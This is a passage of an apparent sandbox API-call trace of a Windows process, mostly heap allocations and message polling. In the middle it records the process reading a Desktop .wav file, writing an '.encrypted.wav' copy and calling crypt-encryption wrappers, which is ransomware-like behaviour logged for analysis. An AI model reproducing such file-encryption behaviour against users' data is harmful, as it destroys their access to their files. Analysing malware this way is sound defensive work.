hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7758 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.485] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0029.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0029.485] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0029.485] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0029.486] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0029.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0029.486] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1ijelx2uuwgwpqu0c7o2.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.486] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.486] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0029.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.486] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0029.487] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0029.487] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0029.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0029.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0029.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0029.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0029.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0029.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0029.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0029.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0029.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.488] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1ijelx2uuwgwpqu0c7o2.encrypted.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0029.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0029.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0029.489] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0029.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0029.489] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.489] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0029.489] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0029.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0029.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.489] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0029.489] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x8fe2, lpOverlapped=0x0) returned 1 [0029.490] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0029.491] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0029.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8fe2) returned 0x8affc0 [0029.491] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.492] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.492] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0029.492] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0029.492] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.492] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0029.492] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.492] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0029.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0029.493] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0029.493] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0029.493] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.493] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.493] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.494] RtlAllocateHeap 